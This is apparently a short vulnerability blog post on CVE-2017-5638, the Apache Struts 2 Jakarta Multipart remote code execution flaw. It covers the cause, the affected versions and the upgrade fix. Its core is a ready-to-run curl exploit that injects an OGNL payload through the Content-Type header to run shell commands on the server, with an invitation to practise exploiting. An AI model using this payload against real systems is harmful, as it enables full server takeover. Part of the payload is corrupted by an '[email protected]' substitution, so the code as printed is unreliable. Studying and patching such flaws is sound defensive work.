Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious Content-Type header is sent with a file upload request. The parser incorrectly evaluates the `Content-Type` value, allowing an attacker to inject Object-Graph Navigation Language (OGNL) expressions. These expressions are then executed by the Struts framework. This occurs because the error-handling mechanism during file upload passes the unvalidated, attacker-controlled Content-Type string directly into an OGNL execution function. Since OGNL is a powerful expression language, this allows for arbitrary code execution with the same privileges as the Struts application server. An attacker can exploit this by crafting a simple HTTP request with a malicious Content-Type header, without needing to upload an actual file, to achieve full system compromise.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: 2017-03-10

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`

How Exploit:

Craft HTTP request with malicious OGNL in Content-Type header.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1.

Impact:

Full server compromise, arbitrary command execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top